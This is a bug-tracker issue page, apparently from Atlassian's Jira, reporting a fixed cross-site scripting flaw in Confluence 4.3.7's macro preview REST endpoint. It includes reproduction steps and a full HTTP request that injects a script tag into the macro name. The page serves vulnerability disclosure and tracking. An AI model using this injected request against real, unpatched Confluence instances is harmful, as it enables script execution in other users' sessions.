Loading...

XML

Word

Printable

Details

Type: Bug
Resolution: Fixed
Priority: High
Fix Version/s: 5.2.4, 5.2.5
Affects Version/s: 4.3.7
Component/s: None
Labels:
- affects-server
- cvss-high
- editor
- loyalty
- security
- xss
Environment:

Standalone 4.3.7, tomcat 6, JDK 1.7, SLES 11 Linux

CVSS Score:
6.5
Bug Fix Policy:
View Atlassian Server bug fix policy

Description

Example:

insert lorem ipsum macro
edit macro in lightbox and press preview
alter the post request as follows:

POST /confluence/rest/tinymce/1/macro/preview HTTP/1.1
Host: test.foo.com
Connection: keep-alive
Content-Length: 136
Accept: text/html, /; q=0.01
Origin: https://test.foo.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.43 Safari/537.31
Content-Type: application/json; charset=UTF-8
Referer: https://test.foo.com/confluence/pages/editpage.action?pageId=123456
Accept-Encoding: gzip,deflate,sdch
Accept-Language: de-DE,de;q=0.8,en-US;q=0.6,en;q=0.4
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: [...]

{"contentId":"12345","macro":{"name":"lorem-ipsum<script>alert(1)</script>","body":""}}

an alert box pops up

This kind of attack works for all macros available

Attachments

- Sort By Name
- Sort By Date
- Ascending
- Descending
- Thumbnails
- List

confluence-tinymce-plugin-4.3.7-CONF30263-1.jar
1.23 MB
23/Aug/2013 2:46 AM

Issue Links

mentioned in: Wiki Page Loading...

Activity

People

Assignee:: Alice Wang (Inactive)

Reporter:: Bernd Schaper

Votes:: 0 Vote for this issue

Watchers:: 5 Start watching this issue

Dates

Created:: 07/Aug/2013 9:10 AM

Updated:: 11/Oct/2018 8:37 AM

Resolved:: 26/Aug/2013 12:46 AM